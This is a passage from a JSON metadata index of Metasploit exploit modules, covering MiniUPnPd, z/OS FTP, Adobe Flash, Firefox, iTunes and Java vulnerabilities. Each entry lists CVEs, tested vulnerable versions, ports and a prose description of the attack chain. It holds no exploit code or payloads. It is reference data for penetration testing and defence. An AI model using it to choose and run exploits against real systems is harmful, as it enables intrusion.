"name": "MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution",
"full_name": "exploit/linux/upnp/miniupnpd_soap_bof",
"rank": 300,
"disclosure_date": "2013-03-27",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Dejan Lukan",
"Onur ALANBEL",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability\n present in the SOAPAction HTTP header handling.",
"references": [
"CVE-2013-0230",
"OSVDB-89624",
"BID-57608",
"URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
],
"platform": "Linux",
"arch": "x86, mipsbe",
"rport": 5555,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Debian GNU/Linux 6.0 / MiniUPnPd 1.0",
"Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb",
"is_install_path": true,
"ref_name": "linux/upnp/miniupnpd_soap_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_mainframe/ftp/ftp_jcl_creds": {
"name": "FTP JCL Execution",
"full_name": "exploit/mainframe/ftp/ftp_jcl_creds",
"rank": 300,
"disclosure_date": "2013-05-12",
"type": "exploit",
"author": [
"Bigendian Smalls",
"mainframed a.k.a. soldier of fortran",
"S&Oxballs a.k.a. chiefascot"
],
"description": "Submits JCL to z/OS via FTP using SITE FILE=JES.\n This exploit requires valid credentials on the target system.",
"references": [
],
"platform": "Mainframe",
"arch": "cmd",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/mainframe/ftp/ftp_jcl_creds.rb",
"is_install_path": true,
"ref_name": "mainframe/ftp/ftp_jcl_creds",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_hacking_team_uaf": {
"name": "Adobe Flash Player ByteArray Use After Free",
"full_name": "exploit/multi/browser/adobe_flash_hacking_team_uaf",
"rank": 500,
"disclosure_date": "2015-07-06",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a use-after-free on Adobe Flash Player. The vulnerability,\n discovered by Hacking Team and made public as part of the July 2015 data leak, was\n described as a Use After Free while handling ByteArray objects. This module has\n been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.",
"references": [
"CVE-2015-5119",
"URL-https://helpx.adobe.com/security/products/flash-player/apsa15-03.html",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/",
"URL-https://twitter.com/w3bd3vil/status/618168863708962816"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_hacking_team_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"0DayFlush"
]
}
},
"exploit_multi/browser/adobe_flash_nellymoser_bof": {
"name": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",
"full_name": "exploit/multi/browser/adobe_flash_nellymoser_bof",
"rank": 500,
"disclosure_date": "2015-06-23",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser\n encoded audio inside a FLV video, as exploited in the wild on June 2015. This module\n has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and\n Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.\n\n Note that this exploit is effective against both CVE-2015-3113 and the\n earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression\n to the same root cause as CVE-2015-3043.",
"references": [
"CVE-2015-3043",
"CVE-2015-3113",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-06.html",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-14.html",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/",
"URL-http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html",
"URL-http://bobao.360.cn/learning/detail/357.html"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_nellymoser_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_net_connection_confusion": {
"name": "Adobe Flash Player NetConnection Type Confusion",
"full_name": "exploit/multi/browser/adobe_flash_net_connection_confusion",
"rank": 500,
"disclosure_date": "2015-03-12",
"type": "exploit",
"author": [
"Natalie Silvanovich",
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a type confusion vulnerability in the NetConnection class on\n Adobe Flash Player. When using a correct memory layout this vulnerability allows\n to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like\n vectors, and ultimately accomplish remote code execution. This module has been tested\n successfully on:\n * Windows 7 SP1 (32-bit), IE 8, IE11 and Adobe Flash 16.0.0.305.\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.305.\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.\n * Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.424.\n * Ubuntu 14.04.2 LTS, Firefox 33.0 and Adobe Flash 11.2.202.442.",
"references": [
"CVE-2015-0336",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-05.html",
"URL-http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html",
"URL-http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html",
"URL-https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html",
"URL-https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_net_connection_confusion",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_opaque_background_uaf": {
"name": "Adobe Flash opaqueBackground Use After Free",
"full_name": "exploit/multi/browser/adobe_flash_opaque_background_uaf",
"rank": 500,
"disclosure_date": "2015-07-06",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a use-after-free on Adobe Flash Player. The vulnerability,\n discovered by Hacking Team and made public as part of the July 2015 data leak, was\n described as a Use After Free while handling the opaqueBackground property\n setter of the flash.display.DisplayObject class. This module is an early release\n tested on:\n\n Windows XP SP3, IE8 and Flash 18.0.0.194,\n Windows XP SP3, IE 8 and Flash 18.0.0.203,\n Windows XP SP3, Firefox and Flash 18.0.0.203,\n Windows Vista SP2 + IE 9 and Flash 18.0.0.203,\n Windows Vista SP2 + Firefox 39.0 and Flash 18.0.0.203,\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\n Windows 7 SP1 (32-bit), IE9 and Adobe Flash 18.0.0.203,\n Windows 7 SP1 (32-bit), Firefox and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203,\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.160 and\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194",
"references": [
"CVE-2015-5122",
"URL-https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html",
"URL-https://helpx.adobe.com/security/products/flash-player/apsa15-04.html",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-18.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_opaque_background_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_pixel_bender_bof": {
"name": "Adobe Flash Player Shader Buffer Overflow",
"full_name": "exploit/multi/browser/adobe_flash_pixel_bender_bof",
"rank": 500,
"disclosure_date": "2014-04-28",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in Adobe Flash Player. The\n vulnerability occurs in the flash.Display.Shader class, when setting specially\n crafted data as its bytecode, as exploited in the wild in April 2014. This module\n has been tested successfully on the following operating systems and Flash versions:\n\n Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182,\n Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182,\n Linux Mint \"Rebecca\" (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350",
"references": [
"CVE-2014-0515",
"BID-67092",
"URL-http://helpx.adobe.com/security/products/flash-player/apsb14-13.html",
"URL-http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_pixel_bender_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_shader_drawing_fill": {
"name": "Adobe Flash Player Drawing Fill Shader Memory Corruption",
"full_name": "exploit/multi/browser/adobe_flash_shader_drawing_fill",
"rank": 500,
"disclosure_date": "2015-05-12",
"type": "exploit",
"author": [
"Chris Evans",
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a memory corruption happening when applying a Shader as a drawing fill\n as exploited in the wild on June 2015. This module has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.",
"references": [
"CVE-2015-3105",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-11.html",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/",
"URL-http://malware.dontneedcoffee.com/2015/06/cve-2015-3105-flash-up-to-1700188-and.html",
"URL-http://help.adobe.com/en_US/as3/dev/WSFDA04BAE-F6BC-43d9-BD9C-08D39CA22086.html"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_shader_drawing_fill",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_shader_job_overflow": {
"name": "Adobe Flash Player ShaderJob Buffer Overflow",
"full_name": "exploit/multi/browser/adobe_flash_shader_job_overflow",
"rank": 500,
"disclosure_date": "2015-05-12",
"type": "exploit",
"author": [
"Chris Evans",
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability related to the ShaderJob workings on\n Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the\n same Bitmap object as src and destination of the ShaderJob. By modifying the \"width\" attribute\n of the ShaderJob after starting the job, it is possible to create a buffer overflow condition\n where the size of the destination buffer and the length of the copy are controlled. This\n module has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169, and\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.",
"references": [
"CVE-2015-3090",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb15-09.html",
"URL-https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html",
"URL-http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html",
"URL-http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_shader_job_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/adobe_flash_uncompress_zlib_uaf": {
"name": "Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",
"full_name": "exploit/multi/browser/adobe_flash_uncompress_zlib_uaf",
"rank": 500,
"disclosure_date": "2014-04-28",
"type": "exploit",
"author": [
"Unknown",
"hdarwin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a use after free vulnerability in Adobe Flash Player. The\n vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying\n to uncompress() a malformed byte stream. This module has been tested successfully\n on:\n * Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.\n * Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Flash 11.2.202.424.",
"references": [
"CVE-2015-0311",
"URL-https://helpx.adobe.com/security/products/flash-player/apsa15-01.html",
"URL-http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/",
"URL-http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb",
"is_install_path": true,
"ref_name": "multi/browser/adobe_flash_uncompress_zlib_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_escape_retval": {
"name": "Firefox 3.5 escape() Return Value Memory Corruption",
"full_name": "exploit/multi/browser/firefox_escape_retval",
"rank": 300,
"disclosure_date": "2009-07-13",
"type": "exploit",
"author": [
"Simon Berry-Byrne <x00050876@itnet.ie>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a memory corruption vulnerability in the Mozilla\n Firefox browser. This flaw occurs when a bug in the javascript interpreter\n fails to preserve the return value of the escape() function and results in\n uninitialized memory being used instead. This module has only been tested\n on Windows, but should work on other platforms as well with the current\n targets.",
"references": [
"CVE-2009-2477",
"OSVDB-55846",
"BID-35660",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=503286"
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 3.5.0 on Windows XP SP0-SP3",
"Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_escape_retval.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_escape_retval",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_pdfjs_privilege_escalation": {
"name": "Firefox PDF.js Privileged Javascript Injection",
"full_name": "exploit/multi/browser/firefox_pdfjs_privilege_escalation",
"rank": 0,
"disclosure_date": "2015-03-31",
"type": "exploit",
"author": [
"Unknown",
"Marius Mlynski",
"joev <joev@metasploit.com>"
],
"description": "This module gains remote code execution on Firefox 35-36 by abusing a\n privilege escalation bug in resource:// URIs. PDF.js is used to exploit\n the bug. This exploit requires the user to click anywhere on the page to\n trigger the vulnerability.",
"references": [
"CVE-2015-0816",
"CVE-2015-0802"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_pdfjs_privilege_escalation",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_proto_crmfrequest": {
"name": "Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution",
"full_name": "exploit/multi/browser/firefox_proto_crmfrequest",
"rank": 600,
"disclosure_date": "2013-08-06",
"type": "exploit",
"author": [
"Mariusz Mlynski",
"moz_bug_r_a4",
"joev <joev@metasploit.com>"
],
"description": "On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given\n invalid input, would throw an exception that did not have an __exposedProps__\n property set. By re-setting this property on the exception object's prototype,\n the chrome-based defineProperty method is made available.\n\n With the defineProperty method, functions belonging to window and document can be\n overridden with a function that gets called from chrome-privileged context. From here,\n another vulnerability in the crypto.generateCRMFRequest function is used to \"peek\"\n into the context's private scope. Since the window does not have a chrome:// URL,\n the insecure parts of Components.classes are not available, so instead the AddonManager\n API is invoked to silently install a malicious plugin.",
"references": [
"CVE-2012-3993",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=768101",
"CVE-2013-1710"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_proto_crmfrequest",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_proxy_prototype": {
"name": "Firefox Proxy Prototype Privileged Javascript Injection",
"full_name": "exploit/multi/browser/firefox_proxy_prototype",
"rank": 0,
"disclosure_date": "2014-01-20",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect\n component and gaining a reference to the privileged chrome:// window. This exploit\n requires the user to click anywhere on the page to trigger the vulnerability.",
"references": [
"CVE-2014-8636",
"CVE-2015-0802",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=1120261",
"URL-https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_proxy_prototype.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_proxy_prototype",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_queryinterface": {
"name": "Firefox location.QueryInterface() Code Execution",
"full_name": "exploit/multi/browser/firefox_queryinterface",
"rank": 300,
"disclosure_date": "2006-02-02",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a code execution vulnerability in the Mozilla\n Firefox browser. To reliably exploit this vulnerability, we need to fill\n almost a gigabyte of memory with our nop sled and payload. This module has\n been tested on OS X 10.3 with the stock Firefox 1.5.0 package.",
"references": [
"CVE-2006-0295",
"OSVDB-22893",
"BID-16476",
"URL-http://www.mozilla.org/security/announce/mfsa2006-04.html"
],
"platform": "Linux,OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 1.5.0.0 Mac OS X",
"Firefox 1.5.0.0 Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_queryinterface.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_queryinterface",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_svg_plugin": {
"name": "Firefox 17.0.1 Flash Privileged Code Injection",
"full_name": "exploit/multi/browser/firefox_svg_plugin",
"rank": 600,
"disclosure_date": "2013-01-08",
"type": "exploit",
"author": [
"Marius Mlynski",
"joev <joev@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This exploit gains remote code execution on Firefox 17 and 17.0.1, provided\n the user has installed Flash. No memory corruption is used.\n\n First, a Flash object is cloned into the anonymous content of the SVG\n \"use\" element in the <body> (CVE-2013-0758). From there, the Flash object\n can navigate a child frame to a URL in the chrome:// scheme.\n\n Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper\n around the child frame's window reference and inject code into the chrome://\n context. Once we have injection into the chrome execution context, we can write\n the payload to disk, chmod it (if posix), and then execute.\n\n Note: Flash is used here to trigger the exploit but any Firefox plugin\n with script access should be able to trigger it.",
"references": [
"CVE-2013-0758",
"CVE-2013-0757",
"OSVDB-89019",
"OSVDB-89020",
"URL-http://www.mozilla.org/security/announce/2013/mfsa2013-15.html",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=813906"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_svg_plugin.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_svg_plugin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_tostring_console_injection": {
"name": "Firefox toString console.time Privileged Javascript Injection",
"full_name": "exploit/multi/browser/firefox_tostring_console_injection",
"rank": 600,
"disclosure_date": "2013-05-14",
"type": "exploit",
"author": [
"moz_bug_r_a4",
"Cody Crews",
"joev <joev@metasploit.com>"
],
"description": "This exploit gains remote code execution on Firefox 15-22 by abusing two separate\n Javascript-related vulnerabilities to ultimately inject malicious Javascript code\n into a context running with chrome:// privileges.",
"references": [
"CVE-2013-1710"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_tostring_console_injection.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_tostring_console_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_webidl_injection": {
"name": "Firefox WebIDL Privileged Javascript Injection",
"full_name": "exploit/multi/browser/firefox_webidl_injection",
"rank": 600,
"disclosure_date": "2014-03-17",
"type": "exploit",
"author": [
"Marius Mlynski",
"joev <joev@metasploit.com>"
],
"description": "This exploit gains remote code execution on Firefox 22-27 by abusing two\n separate privilege escalation vulnerabilities in Firefox's Javascript\n APIs.",
"references": [
"CVE-2014-1510",
"CVE-2014-1511"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/firefox_webidl_injection.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_webidl_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/firefox_xpi_bootstrapped_addon": {
"name": "Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution",
"full_name": "exploit/multi/browser/firefox_xpi_bootstrapped_addon",
"rank": 600,
"disclosure_date": "2007-06-27",
"type": "exploit",
"author": [
"mihi",
"joev <joev@metasploit.com>"
],
"description": "This exploit dynamically creates a .xpi addon file.\n The resulting bootstrapped Firefox addon is presented to\n the victim via a web page. The victim's Firefox browser\n will pop a dialog asking if they trust the addon.\n\n Once the user clicks \"install\", the addon is installed and\n executes the payload with full user permissions. As of Firefox\n 4, this will work without a restart as the addon is marked to\n be \"bootstrapped\". As the addon will execute the payload after\n each Firefox restart, an option can be given to automatically\n uninstall the addon once the payload has been executed.",
"references": [
"URL-https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions",
"URL-http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector"
],
"platform": "Java,Linux,OSX,Solaris,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal (Javascript XPCOM Shell)",
"Native Payload"
],
"mod_time": "2017-08-30 23:16:46 +0000",
"path": "/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb",
"is_install_path": true,
"ref_name": "multi/browser/firefox_xpi_bootstrapped_addon",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/itms_overflow": {
"name": "Apple OS X iTunes 8.1.1 ITMS Overflow",
"full_name": "exploit/multi/browser/itms_overflow",
"rank": 500,
"disclosure_date": "2009-06-01",
"type": "exploit",
"author": [
"Will Drewry <redpig@dataspill.org>"
],
"description": "This module exploits a stack-based buffer overflow in iTunes\n itms:// URL parsing. It is accessible from the browser and\n in Safari, itms urls will be opened in iTunes automatically.\n Because iTunes is multithreaded, only vfork-based payloads should\n be used.",
"references": [
"CVE-2009-0950",
"OSVDB-54833",
"URL-http://support.apple.com/kb/HT3592",
"URL-http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"OS X"
],
"mod_time": "2017-08-30 23:16:46 +0000",
"path": "/modules/exploits/multi/browser/itms_overflow.rb",
"is_install_path": true,
"ref_name": "multi/browser/itms_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/browser/java_atomicreferencearray": {
"name": "Java AtomicReferenceArray Type Violation Vulnerability",
"full_name": "exploit/multi/browser/java_atomicreferencearray",
"rank": 600,
"disclosure_date": "2012-02-14",
"type": "exploit",
"author": [
"Jeroen Frijters",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a vulnerability due to the fact that\n AtomicReferenceArray uses the Unsafe class to store a reference in an\n array directly, which may violate type safety if not used properly.\n This allows a way to escape the JRE sandbox, and load additional classes\n in order to perform malicious operations.",
"references": [
"CVE-2012-0507",
"OSVDB-80724",
"BID-52161",
"URL-http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3",
"URL-http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx",
"URL-http://schierlm.users.sourceforge.net/TypeConfusion.html",
